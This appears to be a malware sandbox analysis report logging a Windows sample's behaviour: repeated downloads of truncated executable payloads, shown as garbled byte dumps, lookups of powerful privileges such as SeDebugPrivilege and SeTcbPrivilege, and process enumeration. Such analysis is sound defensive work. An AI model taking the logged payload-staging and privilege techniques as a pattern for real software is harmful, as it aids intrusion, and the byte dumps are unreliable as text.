InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $½@ÊÎÜ.ÎÜ.ÎÜ.Ú·-ÞÜ.Ú·+wÜ.¢¨+Ü.¢¨ÜÜ.¢¨-ÔÜ.¨&ÏÜ.Ú·ÖÜ.Ú·(ÏÜ.Ú·/ÙÜ.ÎÜ/7Ü.¨ÉÜ.¨+ßÜ.¨ÑÏÜ.ÎÜ¹ÏÜ.¨,ÏÜ.RichÎÜ.PELóyaàî³^à@@ 0(5p¬P8@à.text¡"$ `.gdhjkga@ `.gdhjkgadP, `.gdhjkgaÊ`< `.gdhjkgap@ `.gdhjkga]V `.gdhjkga Z `.gdhjkga© °` `.gdhjkgaÅ Àn `.gdhjkgaÐz `.rdataZ»à¼@@.data¤w .F@À.gdhjkgaP t@À.rsrc(506v@@.reloc¬p¬@BUìj¹(ÌTèaP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìj¹,ÌTèAP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìj¹4ñTè!P ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìèÇ £ñT]ÃÌUìèxÇ £ñT]ÃÌUìj¹óTèáO ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh,fR¹ðòTè®E h@/QèEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìhfR¹òTè~E hP/QèoEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh$fR¹ØòTèNE h`/Qè?EÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìhfR¹¨òTèE hp/QèEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh fR¹ÀòTèîD h/QèßDÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìjÿh¢Qd¡PìD¡D©T3ÅPEôd£ÇóT@ÆóTheRhôeREìPè÷ÄPM°èËÕÇEüMàQU°RMäèäL HQ request_handle: 0x00cc006c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPEL§`à FK0Ð @ O2äÌPPNÑ0O0èÃ@à.textH `.data°J @À.nefaå@N"@À.rsrcÑPNÒ&@@.relocöc0Odø@Bü 8FRbz°¾Øìü(6HVn ¸ÈÜîþ 0 B ` \| ´ Ä Ö ø &6Rh~®ºÒêü >Rjz, 2Hd\|¤¸Ìè@Rb°ÊÚð 8F`zªÀÐæö"4FXn~ª¶ÎÚî:ÖÆòÀÓA°ÜAÀoB0ÅB C1BãB`íCÞA'ga.HÄH¸vscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmodTÉAöÙAÙAöÙATÙAöÙAÙAöÙAÙAÙA·ÙAÙAöÙAöÙAÙAöÙAð?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc0048	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPELo`à FKÎ @ OSÜ¬PPNÑ0O0ÐÁ@à.text( `.data°J @À.vomå@N @À.rsrcÑPNÒ$@@.relocöc0Odö@BÜü & 2 B Z x ¸ Ì Ü ø ( 6 N d ¨ ¼ Î Þ ú "@\p¤¶Øð2H^x²ÊÜê 2 J Z p ~ üô (D\t¬Èæú 2BjxªºÐæ&@Zfp~ °ÆÖâø&8N^p\|®ºÎàð¶ ¦ Ò ÑAÚA mBÃBÿB`/BðàB@ëCàÛA \|haC0Â0¶vscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmod4ÇAÖ×Ao×AÖ×A4×AÖ×Ao×AÖ×Am×Am×A×Am×AÖ×AÖ×Ao×AÖ×Að?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc00e4	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $I4! Uîr Uîr Uîr>êsUîr>ísUîr>ësUîr:êsUîr:ísUîr:ës$Uîr>ïsUîr UïroUîrË:çsUîrË:rUîrË:ìsUîrRich UîrPEd\Ì<að"z\|7@P`TÔ(0è´@Ðµ8¶0¨.text¥yz `.rdataTMN~@@.dataàÌ@À.pdata´Ø@@_RDATA î@@.rsrcè0ð@@.reloc@ò@BH 9yéÌ$ÌÌÌÌHAíÃÌÌÌÌÌÌÌÌHT$LD$LL$ SVWHì0HúHt$`HÙèÊÿÿÿE3ÉHt$ LÇHÓHè<HÄ0_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌ@SHì HÙHÂH õWÀHSHHHèc1HÃHÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQH%HÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHì HHùHÚHÁè1öÃt ºHÏèì#H\$0HÇHÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQHHÁéY1ÌÌÌÌÌÌÌÌÌÌÌÌÌH±HÇAHAH¾HHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìHHL$ èÂÿÿÿH³ÂHL$ è!3Ì@SHì HÙHÂH ÕWÀHSHHHèC0HXHHÃHÄ [ÃÌÌÌÌ@SHì HÙHÂH WÀHSHHHè0HHHÃHÄ [ÃÌÌÌÌH\$Ht$WHìpHçÍH3ÄH$`3öÿ<~ø3ÒNÿï}HØHD$ HøÿtF3ÒA¸0HL$0è·4ÇD$00HT$0HËÿ}Àt9\|$8tHT$0HËÿÁ}ëæt$PHûÿt HËÿ´}ÆH$`H3ÌèL$pI[IsIã_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHìHÍH3ÄH$HÙ3ÀHHAHA3ÒHÿ}HøHD$ Høÿ3ÒA¸0HL$Pèâ3ÇD$P0HT$PHÏÿ¬\|Àt_LD$XHT$\|HL$(èÜHÐHKH;Ktè*HC(ëLÂHÑHËè¥HL$(èKHT$PHÏÿ¥\|Àu©Hÿÿt HÏÿ\|HÃH$H3ÌègH$¨HÄ_ÃÌÌÌÌÌÌ@SHì HQHÙHú request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: rSÑ<¡ö?ÀÐ:Gö?hhö?g6qö?ù"Qjìaö?£J;ORö?d!YÈBö?ÞÀ¸V3ö?@bwú#ö?®1h³ö?X`ö?ü-)4döõ?çÐ¸[çõ?¥âìÃgØõ?W+Éõ?úGÆ¼ºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Òõ?`XVõ?:kP<íqõ?âR\|ºcõ?UUUUUUõ?þ»æ%Gõ?ëôH 9õ?K¨Vÿõ?øâêõ?ÅÄá"õ?PPõ?LÝbóô?9/§àåô?L,Ü¾CØô?n¯%¸Êô?á¦Ý>½ô?[¿R Ö¯ô?Jv¢ô?gÐ²ã9ô?H"ô?{®Gázô?f`Y4Îmô?ÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?Õ%f-ô?QY^&µ ô?ô?feÑô?û°?ûó?¯¥Bîó?©ä¼,âó?ÆuªÙÕó?ç«{¤Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,ó?fÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`ÄÈó?h/¡½öò?KÑþ¡Nëò?KÀ%àò? P- Õò? ,MûÉò?7Zù¾ò?@+´ò?Áó©ò?ä)Aò?¥¸[rò?°°ò?MÎ¡8ú}ò?5'¸Psò?'Ö\|³hò?ñp"^ò?²w~Sò?$I$Iò?[`·>ò?ß¼xV4ò? "*ò?xû!·ò?æUHyò?ÙÀgGò? ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg\|±ñ?{a¹§ñ?àñ?¢Sñ?Û+°ñ?ñ?Öwñ?ysBnñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í _Hñ?$G4?ñ?È5È5ñ?¬Àí,ñ?30]çX#ñ?&H§0ñ?ñ?¾ûñ?ðþðþð?¢%³úíõð?ækõìð?`Uäð?F¨ Ûð?:5VDÒð?;Ú¼OqÉð?qA§Àð?È%ìæ·ð?µì.r/¯ð?§h ¦ð?`¯¦Ûð?T 9?ð?âeu³«ð?B!ð?âê¸){ð?Æ÷G &sð?ûyµjð?ü©ñÒMbð?ur îYð?4×÷Qð?ÅdÌIIð?AAð?üG·Æ8ð?^µ0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞévMÞévMÞévMÊrLÕévMÊuLØévMÊsLGévMÕrLÐévMÕuL×évMÕsLýévMÊwLÝévMÞéwM¼évMLßévMMßévMtLßévMRichÞévMPEd Ì<að" ¶øTZ`¬z(àà°ÜðX8ÐX0Ð.textÅµ¶ ` request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¿´ºûiÚéûiÚéûiÚéïÙèñiÚéïßèaiÚéðÞèêiÚéðÙèìiÚéðßèÑiÚéïÞèîiÚéïÛèòiÚéûiÛéiÚé=ÓèþiÚé=%éúiÚé=ØèúiÚéRichûiÚéPELÚeaà,ðe¤@@P@°ãdè ¸%¶8À¶@@È.textß+, `.rdata ®@°0@@.dataìðà@À.rsrcèì@@.reloc¸% &î@BUìhØE¹àFèþhÀ;Eè´Ä]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌSÜìäðÄUkl$ìì¡ðE3ÅEü3ÀEß3ÉMÞ3ÒUÝEßEØMÞMÔUÝUÐÇE¸EÇE¼äÀñE¸E M¼M¤ÇE°x>XÇE´ÑHU°U¨E´E¬M MÈÇEà7k®ÇEääÀñÇEèx>XÇEìÑH3ÒUÜEÜEÌ(Eà)EMÈ)E(EfïE)pÿÿÿ(pÿÿÿUÈEÈEÄMÄQ¹øFèõhÐ;Eè«ÄMü3Íè&å]ã[ÃÌÌÌÌÌÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèÄEüå]ÂÌÌÌÌUìQMüEüÇ4BEMüÁQèÀÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüEüxtMüQUøëÇEø¬EEøå]ÃÌÌÌÌÌUìQMüEüÇ4BEMüÁQè`ÄUâtjEüPèÓÄEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÇ@ÀEMüÇ@BEUüÇ¼BEEüå]ÃUììMôè²ÿÿÿh<âEEôPè_¡å]ÃUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèIÄUüÇ@BEEüÇ¼BEEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèùÄUüÇ@BEEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUììEÁ#U EMôºkÂÿMôUøÇEðE+MøMü}ür}ü#wë èÅ3Òu÷3ÀuåMUøå]ÃÌÌÌÌÌÌÌÌÌÌÌUìjÿhxEd¡Pìx¡ðE3ÅEðPEôd£ÇEMØè)ÇEüÇEÐÇEÌEEMéM}`UEÇM request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPELå[©_à ¶HKðÐ@PQX¹PPÑàP0¨t@à.textµ¶ `.data°JÐº@À.pakalåðOÒ@À.rsrcÑPÒÖ@@.reloceàPf¨@B¼»Ü»ø»¼¼"¼:¼X¼p¼~¼¼¬¼¼¼Ø¼è¼ö¼½½.½D½`½x½½½®½¾½Ú½ð½¾ ¾<¾P¾`¾t¾¾¾¸¾Ð¾æ¾ö¾¿(¿>¿X¿n¿z¿¿ª¿¼¿Ê¿ê¿þ¿À*À:ÀPÀ^ÀìÄÜÄÔÀàÀòÀÁ$Á<ÁTÁdÁxÁÁ¨ÁÆÁÚÁêÁÂÂ"ÂJÂXÂpÂÂÂ°ÂÆÂàÂøÂÃ Ã:ÃFÃPÃ^ÃjÃÃÃ¦Ã¶ÃÂÃØÃâÃôÃÄÄ.Ä>ÄPÄ\ÄjÄvÄÄÄ®ÄÀÄÐÄúÄÀÀ²ÀCpC DðuDà±D@âCÐD EÀC?a:uivscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmodzC¶COC¶CC¶COC¶CMCMCwCMC¶C¶COC¶Cð?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc0120	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^BàF\|hT`@0w³@°ÜðàCODEÌDF `DATA(`J@ÀBSSõtÀ.idata°t@À.tlsÐÀ.rdataà@P.relocð@P.rsrcÜ¨@P ²@P@Byteÿ@ Stringl@l@8.@D.@H.@L.@@.@-@8-@t-@TObjectÿ% ²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%,²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%ü±BÀÿ%ø±BÀÿ%<²BÀÿ%8²BÀÿ%4²BÀÿ%ô±BÀÿ%H²BÀÿ%D²BÀÿ%ð±BÀÿ%ì±BÀSÄ¼» Tè¡ÿÿÿöD$,t·\$0ÃÄD[ÃÀÿ%è±BÀÿ%ä±BÀÿ%à±BÀÿ%Ü±BÀÿ%Ø±BÀÿ%Ô±BÀÿ%Ð±BÀÿ%Ì±BÀSÄô»ÐB;uYhDjè¦ÿÿÿD$\|$u3À$ëPD$ÌBD$£ÌB3ÀÐÒL$TÑT$T$ T$@øduÜD$D$D$$$Ä[Ã@ÃÀSVÄøòØèfÿÿÿD$\|$u3Àë:T$BFT$B$D$$D$X$T$PD$°YZ^[ÃÄøP$T$$L$ T$$JÐB£ÐBYZÃÀSVWUÄøÙðüBCD$RÊ/M;Èuèÿÿÿ@@CëC;Ðuèqÿÿÿ@CD$;7u®ÓÆèúþÿÿÀu3ÀYZ]_^[Ã@SVWUÄð$ôD$ @;ÈØ>_ùz;ßrv;Èu!BAB)BxuVèðþÿÿëMØ>_ùz;ßu B)Bë3Z\$>.}+û\|$+ÈHT$èMþÿÿÀu3Àë°ë;D$Yÿÿÿ3ÀÄ]_^[ÃSVWÚðþ}¾ëÆÿÿæ request_handle: 0x00cc0078	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $½@ÊÎÜ.ÎÜ.ÎÜ.Ú·-ÞÜ.Ú·+wÜ.¢¨+Ü.¢¨ÜÜ.¢¨-ÔÜ.¨&ÏÜ.Ú·ÖÜ.Ú·(ÏÜ.Ú·/ÙÜ.ÎÜ/7Ü.¨ÉÜ.¨+ßÜ.¨ÑÏÜ.ÎÜ¹ÏÜ.¨,ÏÜ.RichÎÜ.PELóyaàî³^à@@ 0(5p¬P8@à.text¡"$ `.gdhjkga@ `.gdhjkgadP, `.gdhjkgaÊ`< `.gdhjkgap@ `.gdhjkga]V `.gdhjkga Z `.gdhjkga© °` `.gdhjkgaÅ Àn `.gdhjkgaÐz `.rdataZ»à¼@@.data¤w .F@À.gdhjkgaP t@À.rsrc(506v@@.reloc¬p¬@BUìj¹(ÌTèaP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìj¹,ÌTèAP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìj¹4ñTè!P ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìèÇ £ñT]ÃÌUìèxÇ £ñT]ÃÌUìj¹óTèáO ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh,fR¹ðòTè®E h@/QèEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìhfR¹òTè~E hP/QèoEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh$fR¹ØòTèNE h`/Qè?EÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìhfR¹¨òTèE hp/QèEÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìh fR¹ÀòTèîD h/QèßDÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìjÿh¢Qd¡PìD¡D©T3ÅPEôd£ÇóT@ÆóTheRhôeREìPè÷ÄPM°èËÕÇEüMàQU°RMäèäL HQ request_handle: 0x00cc0098	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPELo`à FKÎ @ OSÜ¬PPNÑ0O0ÐÁ@à.text( `.data°J @À.vomå@N @À.rsrcÑPNÒ$@@.relocöc0Odö@BÜü & 2 B Z x ¸ Ì Ü ø ( 6 N d ¨ ¼ Î Þ ú "@\p¤¶Øð2H^x²ÊÜê 2 J Z p ~ üô (D\t¬Èæú 2BjxªºÐæ&@Zfp~ °ÆÖâø&8N^p\|®ºÎàð¶ ¦ Ò ÑAÚA mBÃBÿB`/BðàB@ëCàÛA \|haC0Â0¶vscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmod4ÇAÖ×Ao×AÖ×A4×AÖ×Ao×AÖ×Am×Am×A×Am×AÖ×AÖ×Ao×AÖ×Að?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc00e4	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPEL§`à FK0Ð @ O2äÌPPNÑ0O0èÃ@à.textH `.data°J @À.nefaå@N"@À.rsrcÑPNÒ&@@.relocöc0Odø@Bü 8FRbz°¾Øìü(6HVn ¸ÈÜîþ 0 B ` \| ´ Ä Ö ø &6Rh~®ºÒêü >Rjz, 2Hd\|¤¸Ìè@Rb°ÊÚð 8F`zªÀÐæö"4FXn~ª¶ÎÚî:ÖÆòÀÓA°ÜAÀoB0ÅB C1BãB`íCÞA'ga.HÄH¸vscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmodTÉAöÙAÙAöÙATÙAöÙAÙAöÙAÙAÙA·ÙAÙAöÙAöÙAÙAöÙAð?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc00fc	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPELèì2_à úCnKÅAD@°[mF,þCP@ÑxE( 0H¹A@à.text¨ùCúC `.data°JDþC@À.nayenizå0D@À.rsrcÑ@ÒD@@.relocì ìD@B\D\|DD¦D²DÂDÚDøDDD8DLD\DxDDD¨D¶DÎDäDDD(D<DND^DzDD¢DÀDÜDðDDD$D6DXDpDDD²DÈDÞDøDDD2DJD\DjDDD²DÊDÚDðDþD D\| DtDDD¨DÄDÜDôDDD,DHDfDzDD D²DÂDêDøDD*D:DPDfDDD¦DÀDÚDæDðDþD D D0DFDVDbDxDDD¦D¸DÎDÞDðDüD D D. D: DN D` Dp D D6D&DRD ÉÒ eºöà&pØÀâ`ÓÖza1¨¹A¨Avscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmod´¾VÏïÎVÏ´ÎVÏïÎVÏíÎíÎÏíÎVÏVÏïÎVÏð?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc00b0	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (17 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1
LookupPrivilegeValueW Nov. 5, 2021, 9:07 a.m.	system_name: privilege_name: SeTrustedCredManAccessPrivilege	1	1

Expresses interest in specific running processes (6 events)

process	hyvacaerufe.exe
process	cmd.exe
process	system
process	yy1upurwshhgaxyvfo1fsejc.exe
process	ww15_testll_0310_single.exe
process	bumperww.exe

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 494 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: Yy吐眞 process_identifier: 3568		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3684		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3684		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: customer51.exe process_identifier: 3712		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3824		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3824		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
